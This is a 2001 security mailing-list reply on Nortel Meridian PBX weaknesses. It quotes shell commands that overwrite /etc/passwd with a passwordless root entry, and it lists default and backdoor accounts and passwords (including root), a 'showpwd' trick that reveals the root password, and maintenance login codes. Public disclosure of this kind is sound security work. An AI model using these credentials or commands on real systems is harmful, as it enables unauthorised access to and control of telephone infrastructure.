Re: Nortel Security

From: Mark Rowe (markat_private)
Date: Tue Jul 10 2001 - 04:17:08 PDT

    In article <01063012540504.01490@sliver>, H D Moore
    <hdmat_private> writes

    I came across this while doing a security review 3 years ago. I tried to
    contact Nortel several times but never received a response. I guess they
    don't think it is important :-o

    >If the PBX is hooked into the actual network, there are quite a few ways to
    >get access to the system.  The easiest method is to tftp the /etc/passwd file
    >off the system and crack the hashes.  If you go this route, you will get a
    >user account called "service" with a password of "smile" ;)  If you log into
    >the system with this account, you will notice that /etc is mode 0777, so
    >getting root access is trivial:
    >
    >$ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd
    >$ mv /etc/passwd /etc/passwd.bak
    >$ mv /etc/mah_passwd /etc/passwd
    >$ su root
    ># mv /etc/passwd.bak /etc/passwd
    >
    >I don't remember which version of this system it was, but the client software
    >that came with it was called "Meridian Terminal Emulator".  You could manage
    >the PBX with this by first logging in with 0000/0000 then giving it the
    >manager password of "9999".  I really wish I had more time to write up the
    >stuff I find out there...
    >
    >-HD

    Anyway I think the service account exists on the MAX,CCR and Link
    Meridian components.

    Here are some other stuff I came across,

    Accounts that give UNIX level access
    ====================================

    Box             Account         Password        Use
    MAX,CCR,Link    service         smile           General engineer account
    CCR,Link        disttech        4tas            Engineer account
    MAX             root            3ep5w2u         Root

    Accounts that give application level access

    Box             Account         Password        Use
    MAX             maint           ntacdmax        Maintenance account
    CCR, Link       maint           maint           Maintenance account
    CCR             ccrusr          ccrusr          User account
    Link            mlusr           mlusr           User account

    To gain root access on Link or CCR -

    Login as disttech/4tas

    type "showpwd"

    at prompt enter first 3 letters from Yesterday and first 3 from Tomorrow
    (e.g. if today is Tuesday enter "MonWed" - note the capitalisation).

    When you are told this is invalid, enter the same thing again.

    The root password is now displayed in plain text on the screen.  You can
    now "su" to root with this password.

    To gain access to the Meridian itself - there are two methods of access
    depending how the switch is set up.  Try password only first as most
    will probably be set up like this -

    Password only
    enter
    logi 0000               (customer level)
    logi 1111               (a bit higher)
    logi 8429               (maintence)

    Username and password
    logi customer
    PASS? 0000

    logi admin1
    PASS? 1111

    logi to
    PASS? 8429

    Hope this helps,
    Mark.

    --
    Mark Rowe
    IT Security Consultant

    This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service
    For more information on SecurityFocus' SIA service which automatically alerts you to
    the latest security vulnerabilities please see:

    https://alerts.securityfocus.com/